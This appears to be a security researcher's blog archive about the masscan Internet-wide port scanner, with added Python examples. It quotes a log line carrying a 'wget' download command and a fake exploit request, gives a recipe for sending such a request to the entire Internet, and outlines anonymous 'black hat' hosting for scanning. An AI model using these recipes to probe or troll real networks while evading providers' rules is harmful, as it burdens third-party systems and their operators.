Showing posts with label masscan. Show all posts

Saturday, August 02, 2014

That Apache 0day was troll

Last week, many people saw what they thought was an Apache 0day. They saw logs with lots of suggestive strings that looked like this:

[28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
Somebody has come forward and taken credit for this, admitting it was a troll.

This is sort of a personality test. Many of us immediately assumed this was a troll, but that's because we are apt to disbelieve any hype. Others saw this as some new attack, but that's because they are apt to see attacks out of innocuous traffic. If your organization panicked at this "0day attack", which I'm sure some did, then you failed this personality test.


I don't know what tool the troll used, but I assume it was masscan, because that'd be the easiest way to do it. To do this with masscan, get a Debian/Ubuntu VPS and do the following:

apt-get install libpcap-dev dos2unix
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
echo "GET /my0dayexploit.php?a=\x0acat+/etc/password HTTP/1.0" >header.txt
echo "Referer: http://troll.com" >>header.txt
echo "" >>header.txt
unix2dos header.txt
iptables -A INPUT -p tcp --destination-port 4321 -j DROP

bin/masscan 0.0.0.0/0 -p80 --banners --hello-file header.txt --source-port 4321 --rate 1500000

Depending on the rate your VPS can transmit, you'll cover the entire Internet in one to ten hours.

The response output from servers will be printed to the screen. You probably don't want that, so you should add "-oX troll.xml" to save the responses to an XML file.

The above example uses "echo" to append lines of text to a file, since HTTP is conveniently a text-based protocol. It uses "unix2dos" to convert the line-feeds into the CR-LF combination that HTTP wants.

Masscan has its own TCP/IP stack. Thus, on Linux, it can't simply establish a TCP connection: the kernel never sent the SYN, so when the SYN-ACK comes back to a port with no listening socket, the kernel's TCP stack sees something wrong and sends a RST that kills the connection before masscan can use it. One way to prevent this is a firewall rule telling the built-in Linux TCP/IP stack to ignore the port that masscan uses (the iptables line above). Another way is to give masscan a --source-ip that isn't assigned to any other machine on the local network; the kernel ignores packets addressed to an IP it doesn't own, so it never sends the RST.

The rates at which you can transmit vary widely by hosting provider. In theory, you should get a rate of 1.5-million packets/second, and that's easily obtained in a lab on slow machines. Yet, in real hosting environments, things slow down, and I haven't been able to figure out why. In my experience, 300,000 is more of what you'd expect to get.
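As an added example (not code from the original post or from masscan itself), the following Python does the two fiddly parts of the procedure above without relying on echo and unix2dos: it builds the hello bytes with explicit CR-LF line endings and a terminating blank line, and it pulls IP, port and banner out of the nmap-style XML that -oX writes. The XML sample is constructed for the example and only imitates that format; the function names and the 192.0.2.x addresses are my own.

```python
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple


def build_http_hello(request_line: str, headers: List[str]) -> bytes:
    """Bytes to send after the handshake: every line ends in CR-LF and the
    header block is closed by an empty line, as HTTP requires."""
    lines = [request_line] + list(headers) + [""]
    for line in lines:
        if "\r" in line or "\n" in line:
            raise ValueError("header lines must not contain bare CR or LF")
    # join() puts CR-LF between lines; the trailing CR-LF ends the empty line
    return "\r\n".join(lines).encode("ascii") + b"\r\n"


# Constructed sample imitating masscan's nmap-style -oX output (not real scan data).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="masscan" start="1406577847" version="1.0">
<scaninfo type="syn" protocol="tcp"/>
<host endtime="1406577847"><address addr="192.0.2.10" addrtype="ipv4"/><ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="54"/><service name="http"><banner>HTTP/1.1 301 Moved Permanently</banner></service></port></ports></host>
<host endtime="1406577848"><address addr="192.0.2.11" addrtype="ipv4"/><ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="51"/></port></ports></host>
</nmaprun>
"""


def parse_masscan_xml(xml_text: str) -> List[Tuple[str, int, Optional[str]]]:
    """Return (ip, port, banner) for every <port> in the file.
    A host that answered the SYN but sent no banner gets banner=None."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr = host.find("address")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.iter("port"):
            portid = int(port.get("portid"))
            banner_el = port.find("./service/banner")
            banner = banner_el.text if banner_el is not None else None
            results.append((ip, portid, banner))
    return results


if __name__ == "__main__":
    # Same request as the echo/unix2dos recipe above; the backslash is literal,
    # exactly as a plain "echo" would have written it.
    hello = build_http_hello(
        "GET /my0dayexploit.php?a=\\x0acat+/etc/password HTTP/1.0",
        ["Referer: http://troll.com"],
    )
    with open("header.txt", "wb") as f:
        f.write(hello)
    for ip, port, banner in parse_masscan_xml(SAMPLE_XML):
        print(ip, port, banner)
```

Writing the file in binary mode matters: opening it in text mode on some platforms would translate the CR-LF pairs again and undo the work.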


Monday, January 20, 2014

Masscan supports SCTP

Besides the well-known transport protocols of TCP and UDP, there is also one called SCTP. Linux and the BSDs have shipped an SCTP stack for around a decade. Almost nobody uses it. I know little more about this protocol than you do.

But I can now scan for it in masscan. Scanning the entire Internet for an SCTP service (here the LTE S1AP and X2AP ports, 36412 and 36422) would look something like this:

masscan 0.0.0.0/0 -pS:36422,36412 --rate 100000

Tuesday, January 14, 2014

BTC 0.1 for 'masscan' logo

I've written a tool 'masscan' that's become more popular than I thought it would be. I've decided I need a logo for it. I'm paying 0.1 Bitcoin to anybody that sends me a logo that I use. The only acceptance criterion is that I actually start using the logo. 0.1 bitcoin is only $80 at today's exchange rate, so it's not a lot of money. If you feel your time is worth more, then tell me how much it's worth: I can't start using the logo if I don't pay your price. Conversely, if I get one logo and start using it, then the next day somebody else comes up with a better logo, I'll have to pay both people: using the logo constitutes acceptance.

The following post is some information that may help you design a logo.

Masscan: diagnosing slow transmit speeds

My port scanner (masscan) can easily transmit at full 1-gbps speeds, even from a slow laptop. Yet, often when you run it, it fails to run that fast. Instead of 1.488 million packets/second, it does only 0.2 million packets/second. Why is that?

There are lots of reasons, but the biggest is probably "flow control" on the Ethernet switch.

Tuesday, December 31, 2013

Masscan: designing my own crypto

Like many programmers, one of the things I like to do is design my own crypto algorithms. Specifically, at the heart of my port-scanner masscan is a cryptographic algorithm for randomizing IP addresses and port numbers.

This algorithm has flaws. Well, it's good enough for port scanning, but it's not cryptographically secure. In this post, I describe how to graph its output so that these flaws can be detected. Update: I added a second nmap sample to compare against.
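An added illustration of the idea behind such a randomizer, written for this page rather than taken from masscan: a keyed Feistel network gives a bijection over a power-of-two domain, and cycle-walking (re-applying the permutation until the output lands below n) turns it into a bijection over an arbitrary range such as hosts × ports. Walking i = 0, 1, 2, ... through forward() then visits every host/port pair exactly once in a key-dependent order with no per-target state, which is what an Internet-scale scanner needs. Whether masscan's own round function and round count look like this is not something the excerpt says; the names (`RangePermutation`, `scan_order`) and the SHA-256 round function are assumptions of mine. Four rounds over a tiny domain spread a scan out nicely but should not be mistaken for a secure cipher, which is the post's point.

```python
import hashlib
import struct
from typing import Iterator, Tuple


def _round_fn(key: bytes, round_no: int, half: int, half_bits: int) -> int:
    """Keyed round function F(key, round, half) -> half_bits-bit value.
    SHA-256 is overkill for scanning; it is used here only because it is at hand."""
    digest = hashlib.sha256(key + struct.pack(">IQ", round_no, half)).digest()
    return int.from_bytes(digest[:8], "big") & ((1 << half_bits) - 1)


class RangePermutation:
    """Keyed bijection on [0, n): a balanced Feistel network over the smallest
    even-bit-width domain >= n, plus cycle-walking to skip outputs >= n."""

    def __init__(self, n: int, key: bytes, rounds: int = 4):
        if n < 2:
            raise ValueError("need a range of at least 2 elements")
        self.n = n
        self.key = key
        self.rounds = rounds
        total_bits = max(2, (n - 1).bit_length())
        self.half_bits = (total_bits + 1) // 2      # domain is 2 * half_bits wide
        self.mask = (1 << self.half_bits) - 1

    def _feistel(self, x: int, inverse: bool = False) -> int:
        left, right = x >> self.half_bits, x & self.mask
        order = range(self.rounds - 1, -1, -1) if inverse else range(self.rounds)
        for r in order:
            if inverse:
                # undo (L, R) -> (R, L ^ F(R)): new L = R' ^ F(L'), new R = L'
                left, right = right ^ _round_fn(self.key, r, left, self.half_bits), left
            else:
                left, right = right, left ^ _round_fn(self.key, r, right, self.half_bits)
        return (left << self.half_bits) | right

    def forward(self, i: int) -> int:
        """Position i of the scan -> index of the target to probe."""
        y = self._feistel(i)
        while y >= self.n:            # cycle-walk past values outside the range
            y = self._feistel(y)
        return y

    def inverse(self, y: int) -> int:
        """Target index -> the position at which it was (or will be) probed."""
        x = self._feistel(y, inverse=True)
        while x >= self.n:
            x = self._feistel(x, inverse=True)
        return x


def scan_order(num_hosts: int, num_ports: int, key: bytes) -> Iterator[Tuple[int, int]]:
    """Yield (host_index, port_index) pairs, each exactly once, in a keyed random
    order; the key is the only state the scanner needs to carry."""
    perm = RangePermutation(num_hosts * num_ports, key)
    for i in range(num_hosts * num_ports):
        p = perm.forward(i)
        yield p // num_ports, p % num_ports


if __name__ == "__main__":
    # 16 hosts x 2 ports, e.g. a /28 scanned on two ports
    for host, port in scan_order(16, 2, b"example-key"):
        print(host, port)
```

Because the permutation is invertible, a scanner can also turn a late reply back into the position it was sent at, which is how a stateless scanner can tell its own probes apart from unrelated traffic without keeping a table of every target.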

Saturday, December 28, 2013

Masscan does ARP

My port scanner, masscan, also does ARP scanning. Sure, other ARP scanning tools exist (like arpscan), but I'm too lazy to learn how they work, so I just added the functionality to my tool.

Here's how you use it. Right now I'm plugged into the local wired Ethernet. When I do an ifconfig, I get the following result:
inet 10.59.36.10 netmask 0xffff0000 broadcast 10.59.255.255
That means there is an entire /16 of devices out there. I want to discover them, so I run masscan with the following parameters:
masscan 10.59.0.0/16 --arp --source-ip 10.59.36.200 --source-mac 66-55-44-33-22-11 --rate 1000
This produces results that look like:

Starting masscan 1.0 (http://bit.ly/14GZzcT) at 2013-12-28 04:39:52 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 65536 hosts [1 port/host]
Discovered open port 0/arp on 10.59.1.1 
Discovered open port 0/arp on 10.59.30.11
Discovered open port 0/arp on 10.59.30.4
Discovered open port 0/arp on 10.59.33.187
Discovered open port 0/arp on 10.59.31.46
Discovered open port 0/arp on 10.59.33.151
...

There's some weirdness in how it displays the results. It claims things are "ports" because masscan is a port scanner, even though ARP has no ports. I should probably fix this.

In the above example I spoof the source IP and MAC address. This isn't strictly necessary, because if you don't specify them, masscan will use the IP/MAC of your current configuration. But in general, masscan should always be used in spoofing mode, so I include them on general principles.

The reason I added it is because on the flight back from BruCon (a Belgian cyber-security conference), I was upgraded to business class, which had an Ethernet port. Attaching a cable to the port gave me link status, but no DHCP results. Also, tcpdump revealed no packets at all coming from the port. Therefore, I needed to scan the port to see if anything was listening, so I quickly added the ARP scanning code to masscan, then blasted the port. I first scanned the private address ranges, then the rest of the Internet address ranges. Despite the port being only 100-mbps, I could just about scan the entire 32-bit address space in the 10 hours of the flight. I didn't find anything, but that could be because transmitting 150,000 ARP requests per second can overwhelm whatever device they have on the other end that might respond.

That last point is pretty important: ARP requests are sent to the Ethernet broadcast address (ff-ff-ff-ff-ff-ff), and thus are received and processed by every machine on the local link. Masscan is very fast, usually faster than the receiving machines can handle. You can easily go too fast, causing receiving machines to drop packets, and they cannot respond to a request they dropped. Thus, at high speeds you'll miss results that you'd get at a slower speed. And you might DoS machines on the local segment, which will anger people.

One question is which source IP address to use. As far as I can tell, testing with Windows, Mac OS X, and Linux, any IP address works. Say a target machine has the IP address 10.2.4.6 with a subnet mask of 255.255.255.0. In my tests, you can still use a sender IP like 192.168.1.2 that is outside the target's subnet, and it'll still respond to the ARP request.
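To make the frame-level details above concrete, here is an added example (my own code, not masscan's) that builds the 42-byte ARP who-has frame an ARP sweep sends, with the spoofed sender MAC and IP from the command line above, and parses the is-at reply that comes back. The Ethernet destination is the broadcast MAC, which is why every host on the segment has to look at every request and why the rate matters. The reply frame used to exercise the parser is constructed, and `build_arp_request`, `parse_arp_reply` and `arp_sweep_frames` are names I chose.

```python
import ipaddress
import struct
from typing import Iterator, Optional, Tuple

ETHERTYPE_ARP = 0x0806
BROADCAST_MAC = b"\xff" * 6
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    """Accept both 66-55-44-33-22-11 (masscan style) and 66:55:44:33:22:11."""
    parts = mac.replace("-", ":").split(":")
    if len(parts) != 6:
        raise ValueError("bad MAC: %r" % mac)
    return bytes(int(p, 16) for p in parts)


def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def ip_bytes(ip: str) -> bytes:
    return ipaddress.IPv4Address(ip).packed


def ip_str(raw: bytes) -> str:
    return str(ipaddress.IPv4Address(raw))


def build_arp_request(sender_mac: str, sender_ip: str, target_ip: str) -> bytes:
    """Ethernet frame carrying an ARP who-has for target_ip. Destination is the
    broadcast MAC; the sender fields are whatever we claim, i.e. spoofable."""
    ether = BROADCAST_MAC + mac_bytes(sender_mac) + struct.pack(">H", ETHERTYPE_ARP)
    arp = (struct.pack(">HHBBH", 1, 0x0800, 6, 4, ARP_REQUEST)   # htype, ptype, hlen, plen, op
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + b"\x00" * 6 + ip_bytes(target_ip))                   # target MAC unknown
    return ether + arp    # 14 + 28 = 42 bytes; the NIC pads to 60 and appends the FCS


def parse_arp_reply(frame: bytes) -> Optional[Tuple[str, str]]:
    """(mac, ip) of the host that answered, or None if this is not an ARP reply."""
    if len(frame) < 42 or struct.unpack(">H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    if struct.unpack(">HHBBH", frame[14:22]) != (1, 0x0800, 6, 4, ARP_REPLY):
        return None
    return mac_str(frame[22:28]), ip_str(frame[28:32])


def build_arp_reply(responder_mac: str, responder_ip: str,
                    requester_mac: str, requester_ip: str) -> bytes:
    """Constructed is-at reply, used here only to exercise the parser offline."""
    ether = mac_bytes(requester_mac) + mac_bytes(responder_mac) + struct.pack(">H", ETHERTYPE_ARP)
    arp = (struct.pack(">HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
           + mac_bytes(responder_mac) + ip_bytes(responder_ip)
           + mac_bytes(requester_mac) + ip_bytes(requester_ip))
    return ether + arp


def arp_sweep_frames(network: str, sender_mac: str, sender_ip: str) -> Iterator[bytes]:
    """One who-has per host address in the network, e.g. the /16 scanned above.
    Whatever sends these must pace them: every frame hits every host on the segment."""
    for host in ipaddress.ip_network(network, strict=False).hosts():
        yield build_arp_request(sender_mac, sender_ip, str(host))


if __name__ == "__main__":
    req = build_arp_request("66-55-44-33-22-11", "10.59.36.200", "10.59.1.1")
    print(len(req), req.hex())
    reply = build_arp_reply("00:11:22:33:44:55", "10.59.1.1", "66:55:44:33:22:11", "10.59.36.200")
    print(parse_arp_reply(reply))
```

Putting the frames on the wire needs a raw link-layer socket (AF_PACKET on Linux) or libpcap, which is what masscan uses; the parser is where a sweep spends most of its effort, since anything that is not a well-formed reply has to be ignored rather than trusted.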


Anyway, if you use masscan, just remember that instead of port numbers, you can specify --arp, and it'll do pretty much what you'd expect it to do.

Monday, December 16, 2013

CCC, 100-gbps, and your own private Shodan

One of the oldest/biggest "hacker" conventions is the CCC congress every December in Germany. This year, they are promising 100-gbps connectivity to the Internet. That's 'g' as in 'giga', and as in 'omfg that's a lot of bandwidth'.

So, what shall we do with all this bandwidth? The answer is masscan: scan the entire Internet and create your own, private, Shodan-style database.

Tuesday, October 15, 2013

That DLink bug (masscan)

This last weekend, an interesting backdoor was found in D-Link routers when a certain user-agent is set. How many Internet-accessible routers are vulnerable to this bug? Well, that sounds like a problem for 'masscan', my Internet-scale scanner.

Last Sunday I ran two scans of the Internet on port 80, one with the user-agent of "masscan/1.0", and the other with the offending user-agent of "xmlset_roodkcableoj28840ybtide", in order to see the difference. I still haven't processed the full results yet, because apparently, most of these devices run at port 8080 rather than port 80. On port 80, we found 2139 vulnerable devices, there should be a lot more at port 8080. Therefore tonight you are going to see my scanners pop up in your logs again, assuming you are monitoring what goes on at port 8080.

Sunday, October 13, 2013

FAQ: from where can I scan the Internet?

I've written a program that can effortlessly scan the entire Internet (masscan). Unfortunately, scanning the Internet is against most "Acceptable Use Policies". Therefore, if you try to run it from your home network or a hosting environment (like the Amazon cloud), they'll quickly shut you down. Where, then, can legitimate researchers run this tool?

I don't know a good answer. We work closely with a hosting provider. We give them free consulting, such as pentesting and incident analysis. We handle all the abuse complaints ourselves, responding quickly to them, and adding anybody who asks to our "exclude" list. They in turn allow us to do something that most hosting providers would not.

It's not that scanning is intrinsically bad or illegal, it's just that it's associated with hackers/scammers/spammers. If they know that you are a good guy, most hosting companies wouldn't care. Your struggle is to convince them that you are a good guy.

But frankly, being the good guy is a lot of hassle. I don't mind being called a "fucking asshole" in the abuse complaints (which happens), but I do mind the legal threats. I'm extremely open and transparent about my scans, documenting when I do them, what I'm doing, the raw results, and the source code of the tool I use. Yet, all this can become evidence in a trial in the modern climate of over-prosecution of researchers. It might be safer to take the black hat route.

The black hat route is to anonymously get some bitcoins (such as off Craig's list or at the local park of your city), then use hosting environments that accept bitcoins. You'll pay about $10 to $20 for a VPS (virtual private server), and then download and run masscan. By the time they get around to canceling your account, you can complete a single scan of a port on the Internet. Running masscan, it's about 10 hours running at 100,000 packets/second or 40-mbps. VPSs can easily go faster than that on gigabit connections, such as 400,000 packets/second.

Another black hat route is to go to the scammer-friendly ISPs, the ones who already host hackers, spammers, gambling sites, and porn sites. There are a lot of them in China, Russia, and the Caribbean.

Then there is the well-known technique of compromising desktops around the world and distributing your scan across them. Masscan has a lot of good features for dividing scans across machines, though if you are going this route, you should probably use nmap instead. Masscan is for one massive scan from a small number of machines; nmap is better at small scans from a massive number of machines. You'd be breaking a bunch of laws just compromising those machines in the first place, so of course I wouldn't recommend it; it's just something that others have done.

The Internet is designed to be an "end-to-end" network, where such massive scanning is as normal as spidering websites for search engines. A lot of people aren't happy about this, of course, but such scanning is intrinsic to the design of the Internet. Moreover, the more we know about the state of the Internet, the better we can secure it. It's astonishing how little people know about what's listening on the Internet. The more we do this, and publish our results, the better off the Internet will be.

If anybody has better strategies on where to scan from, please drop me a comment. I'd love to see more scanning.

Monday, October 07, 2013

What's the max speed on Ethernet?

My port scanner (masscan) can transmit at the maximum speed of Ethernet. So what does that mean?

A 1-gbps Ethernet link has the precise bit-rate of 1000000000.0 bits-per-second (bps). Depending on the accuracy of the clock oscillator, this may be a few bps faster or slower, but at least this is the standard rate.

But for port scanning, the more important metric is "packets-per-second" (pps). We have to divide the bit rate by the size of a packet on the wire in order to get the packet rate. In this post, I "show my work", the math to derive this.
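The arithmetic behind the 1.488 million figure quoted elsewhere on this page, carried through as an added example (my code, not the post's): a minimum-size frame is 64 bytes including the FCS, but on the wire it is preceded by an 8-byte preamble and followed by a 12-byte inter-frame gap, so each one occupies 84 bytes, or 672 bit-times. A bare TCP SYN (14 + 20 + 20 + 4 bytes) falls below the minimum and is padded up to it, which is why a SYN scan runs at the minimum-frame rate. The function names are mine; the 2^32 target count used for the scan-time estimate ignores the reserved ranges a real scan skips.

```python
PREAMBLE_AND_SFD = 8   # bytes on the wire before every frame
INTERFRAME_GAP = 12    # idle bytes the transmitter must leave after every frame
FCS = 4                # frame check sequence, counted inside the frame size
MIN_FRAME = 64         # Ethernet minimum frame, FCS included
MAX_FRAME = 1518       # non-jumbo maximum, FCS included


def wire_bits(frame_bytes: int) -> int:
    """Bit-times one frame occupies on the link, overhead included.
    Anything shorter than the minimum is padded, so it costs the same."""
    frame_bytes = max(frame_bytes, MIN_FRAME)
    return (PREAMBLE_AND_SFD + frame_bytes + INTERFRAME_GAP) * 8


def syn_frame_bytes(tcp_options_bytes: int = 0) -> int:
    """Ethernet 14 + IPv4 20 + TCP 20 (+ options) + FCS, padded to the minimum.
    A bare SYN is 58 bytes and a SYN with a 4-byte MSS option is 62; both pad to 64."""
    return max(14 + 20 + 20 + tcp_options_bytes + FCS, MIN_FRAME)


def max_pps(link_bps: int, frame_bytes: int = MIN_FRAME) -> int:
    """Line-rate packet count per second: bit rate divided by bits per frame."""
    return link_bps // wire_bits(frame_bytes)


def seconds_to_scan(num_targets: int, pps: int) -> float:
    """Time to send one probe to every target at a steady rate."""
    return num_targets / pps


if __name__ == "__main__":
    for link in (10**8, 10**9, 10**10):
        pps = max_pps(link, syn_frame_bytes())
        print("%5d Mbps: %10d SYN/s, IPv4 in %6.0f s" % (link // 10**6, pps, seconds_to_scan(2**32, pps)))
```

Run as a script it prints roughly 148,809 SYN/s for 100-mbps, 1,488,095 for 1-gbps and 14,880,952 for 10-gbps, i.e. about 8 hours, 48 minutes and 5 minutes to cover IPv4; the 300,000 pps the first post on this page reports from a VPS works out to about four hours.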

Fun with IDS funtime, part 2

As I posted last week, intrusion detection systems (IDS) are catching me doing Internet-scale surveys. This gives me a chance to try and evade them. Of course, once I evade them, I have to document my tricks, so they can catch me again -- because I'm not actually trying to go undetected. I'm just having fun.

My latest trick involves DNS and the "version.bind" detection. You can query the version information of a DNS server by sending a "chaos txt version.bind" query to it instead of a normal query like www.google.com. The Snort signature that detects this looked like the following:

Tuesday, October 01, 2013

Fun with IDS funtime

We've been scanning the entire Internet for a while, and amuse ourselves reading the "abuse" complaints. Those with firewalls dropping the packets are sensible, and send relatively sane requests on the matter. Those with IDS (intrusion detection systems) are sometimes a bit hysterical, using automated messages claiming that we are "hacking" them and that our activity is "illegal". They have too much faith that when an IDS labels something as an "intrusion" the IDS is telling the truth.

I'm scanning udp/161 (SNMP) right now

I'm scanning the entire Internet for SNMP (UDP port 161) right now:

masscan 0.0.0.0/0 -pU:161 --banners

SNMP is the "simple network management protocol", which is the Internet standard for monitoring devices (like temperature and traffic rates), getting alerts from devices (like when the power fails), and most importantly, controlling devices. It's such a dangerous protocol that it should never be exposed to the public Internet. I should get back zero responses to my scan -- but I'm getting millions.

Wednesday, September 25, 2013

I'm scanning udp/53 right now

So I'm scanning the Internet with a DNS version request, because it'd be a useful datapoint in my Friday #Brucon talk mentioning that BIND is still the overwhelming favorite DNS server on the Internet. The abuse reports are an interesting read, such as one that claims "This activity is neither just a scanning nor unexpected attempts, but a sophisticated attack". Nope, it's just scanning, and terribly unsophisticated.
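The "version.bind" query behind this scan, and the detection discussed in the IDS post above, come down to a handful of bytes. Here is an added example (my own code, not the scanner's) that builds the CHAOS-class TXT query for version.bind, then parses a response and returns the TXT strings, handling the name-compression pointer a real server puts in the answer. The reply fed to the parser is constructed; a real BIND answers with its version string in the same shape. The question section, `\x07version\x04bind\x00\x00\x10\x00\x03`, is the fixed pattern any signature for this query has to match on, regardless of which tool sent it.

```python
import struct
from typing import List, Tuple

VERSION_BIND = "version.bind"
QTYPE_TXT = 16
QCLASS_CHAOS = 3


def encode_name(name: str) -> bytes:
    """DNS wire name: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_version_query(txid: int = 0x1234) -> bytes:
    """Header (RD set, one question) + question for version.bind CH TXT."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(VERSION_BIND) + struct.pack(">HH", QTYPE_TXT, QCLASS_CHAOS)


def _read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels = []
    end = None                      # set when the first pointer is followed
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:   # compression pointer into the message
            if end is None:
                end = off + 2
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_version_response(msg: bytes) -> List[str]:
    """Return the TXT strings from CH TXT answers; empty if none or on error RCODE."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    if flags & 0x000F:              # non-zero RCODE: REFUSED, NXDOMAIN, ...
        return []
    off = 12
    for _ in range(qd):             # skip the echoed question(s)
        _, off = _read_name(msg, off)
        off += 4
    texts = []
    for _ in range(an):
        _, off = _read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_TXT and rclass == QCLASS_CHAOS:
            i = 0
            while i < len(rdata):   # TXT rdata is a sequence of length-prefixed strings
                n = rdata[i]
                texts.append(rdata[i + 1:i + 1 + n].decode("ascii", "replace"))
                i += 1 + n
    return texts


def build_sample_response(txid: int, version: str) -> bytes:
    """Constructed reply in the shape a real server sends: the question echoed,
    then one answer whose name is a pointer (0xC00C) back to offset 12."""
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = build_version_query(txid)[12:]
    rdata = bytes([len(version)]) + version.encode("ascii")
    answer = b"\xc0\x0c" + struct.pack(">HHIH", QTYPE_TXT, QCLASS_CHAOS, 0, len(rdata)) + rdata
    return header + question + answer


if __name__ == "__main__":
    print(build_version_query().hex())
    print(parse_version_response(build_sample_response(0x1234, "9.8.1-P1")))
```

Sending it is a single UDP datagram to port 53; the parser deliberately returns nothing rather than raising on a REFUSED reply, since many operators configure `version "none";` and the scan should record that as "no banner", not as an error.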

Saturday, September 14, 2013

Masscan: the entire Internet in 3 minutes


I thought I'd write up some notes about my "masscan" port mapper.

Masscan is the fastest port scanner, more than 10 times faster than any other port scanner. As the screenshot shows, it can transmit 25 million packets/second, which is fast enough to scan the entire Internet in just under 3 minutes. The system doing this is just a typical quad-core desktop processor. The only unusual part of the system is the dual-port 10-gbps Ethernet card (most computers have only 1-gbps Ethernet).

Masscan is a typical "async/syn-cookie" scanner like 'scanrand', 'unicornscan', and 'ZMap'. The distinctive benefits of masscan are:
  1. speed
  2. better randomization
  3. flexibility
  4. compatibility
These are described in more detail below.

Friday, September 13, 2013

We scanned the Internet for port 22

Yesterday (Sept. 12) we scanned the entire Internet for port 22 -- the port reserved for "SSH", the protocol used by sysadmins to remotely log into machines.  Unlike our normal scans of port 80 or 443, this generated a lot more "abuse" complaints, so I thought I'd explain the scan.

Firstly, we'll happily add you to our "blacklist", so that we won't scan you ever again (barring accidents on our part). Our current blacklist is hundreds of entries long. However, please consider adding our scanner (71.6.151.167) to your "whitelist". We are well-known cyber-sec researchers, we aren't trying anything nefarious or evil, and we are being as transparent as possible about our scans.

Our scanner was just checking banners. It didn't complete the connection, nor did it try any passwords. Several abuse complaints assumed that we were trying to "login", but we weren't. Yes, hackers are constantly trying to login into SSH servers, so it's a good assumption to make, it's just that in this case, it doesn't apply to us.